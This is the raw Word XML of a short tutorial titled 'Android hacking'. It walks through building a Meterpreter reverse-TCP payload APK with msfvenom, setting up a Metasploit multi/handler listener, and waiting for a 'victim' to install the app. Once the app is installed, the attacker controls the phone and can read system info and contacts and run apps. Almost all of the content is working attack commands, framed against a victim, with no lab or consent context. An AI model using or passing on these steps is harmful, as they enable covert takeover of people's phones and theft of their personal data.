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769C" w14:textId="6D3DA1B5" w:rsidR="003F6FFF" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01AC6">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70717EC2" w14:textId="77777777" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BF07BF" w14:textId="4163190D" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01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  <w:t xml:space="preserve"> First Create a Payload :- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66928FD9" w14:textId="571BE096" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="6383BB73" w14:textId="4015907F" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC6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01AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command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:- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16551F52" w14:textId="5449E5D7" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC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msfvenom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-p android/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meterpreter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reverse_tcp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LHOST= 192.168.0.130 LPORT=4444 R &gt;</w:t>
      </w:r>
      <w:r w:rsidR="008B56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avenger.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DD29AC3" w14:textId="23880B6D" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC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7463B48" w14:textId="77777777" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01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 this payload(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in victim phone and download file in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A5FFFD" w14:textId="3F9672D4" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01A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A1B9E7" w14:textId="55F70434" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01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  <w:t xml:space="preserve"> Start the meta exploit frame :- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C012E6" w14:textId="77777777" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01A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4B826" w14:textId="09687159" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC6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01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1AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command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:- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39536EEF" w14:textId="77777777" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01A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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EE1CCCB" w14:textId="77777777" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01A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86C4FC" w14:textId="06CFF3B3" w:rsidR="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01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</w:pPr>
      <w:r w:rsidRPr="00F01A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15E3"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  <w:t>Use exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01AC6"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  <w:t xml:space="preserve"> :- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4CEB3" w14:textId="033A9D78" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="7AB7C28E" w14:textId="50E95CC7" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3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01AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command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:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23991895" w14:textId="111A826A" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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E15E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315740C" w14:textId="19D2908E" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15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4EFF56" w14:textId="5A044DD2" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E1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  <w:t>Set payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01AC6"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  <w:t xml:space="preserve"> :- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E005879" w14:textId="5DEF875F" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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BCE75E6" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3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01AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command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:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7033EE17" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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set PAYLOAD android/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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61D70F74" w14:textId="13B80794" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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5EA3708" w14:textId="1923A0C5" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E1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  <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Check the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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  <w:t>whether</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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  <w:t xml:space="preserve"> LHOST and LPORT is set or not, if not then set them</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01AC6"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  <w:t xml:space="preserve"> :- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16076CEB" w14:textId="284FC888" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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7A1974E" w14:textId="56E3A6B5" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3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01AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command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:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F60B1" w14:textId="0FAD5892" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3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82B8CAB" w14:textId="7C0DC287" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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E15E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECA24A" w14:textId="2F1AC46E" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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0EE77BE" w14:textId="10C2EE70" w:rsidR="001E15E3" w:rsidRPr="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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LHOST is not set then do it By this below command :-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCD204" w14:textId="2141F4DD" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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LHOST 192.168.0.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09010DCC" w14:textId="087B1225" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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2CCB898" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E1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  <w:t>Access the control of phone</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01AC6"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  <w:t xml:space="preserve"> :-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A00453B" w14:textId="24C16E05" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="2DA8CB50" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3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01AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command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:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA680D2" w14:textId="3F8C796E" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="4D58E269" w14:textId="2E5441A5" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716729BC" w14:textId="1DB9067D" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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B5DF609" w14:textId="7794FC5B" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15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wait till the victim install the payload (app) in the phone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A226F2" w14:textId="10834F00" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15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installing app in phone, we get access the control of phone</w:t>
      </w:r>
      <w:r w:rsidR="005961B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and start the session in kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005961B3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</w:p>
    <w:p w14:paraId="187A6B93" w14:textId="39972590" w:rsidR="005961B3" w:rsidRDefault="005961B3" w:rsidP="001E15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Now, We can do many process on the phone through kali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Go the help command, it’s show many command which we can do such as we can know about system info , we can run any app and we can know list of contact no, which are stored in phone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3AA02E" w14:textId="1AF16FE2" w:rsidR="001E15E3" w:rsidRPr="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15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1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B195860" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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5D7353F" w14:textId="1FDEAB2C" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7473D068" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15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292DCA" w14:textId="1E6E66FE" w:rsidR="001E15E3" w:rsidRPr="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15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15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170659" w14:textId="77777777" w:rsidR="001E15E3" w:rsidRPr="001E15E3" w:rsidRDefault="001E15E3" w:rsidP="001E15E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52B0D3F" w14:textId="543FC027" w:rsidR="00F01AC6" w:rsidRPr="00F01AC6" w:rsidRDefault="00F01AC6" w:rsidP="00F01AC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01AC6" w:rsidRPr="00F0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29B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8026B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B2E1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8026B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451C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC003E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6C"/>
    <w:rsid w:val="001E15E3"/>
    <w:rsid w:val="003F6FFF"/>
    <w:rsid w:val="005961B3"/>
    <w:rsid w:val="008B5680"/>
    <w:rsid w:val="00D8436C"/>
    <w:rsid w:val="00F0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942C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{20BF8507-DAFD-48F3-965C-C1120728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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-12T16:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-12T16:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>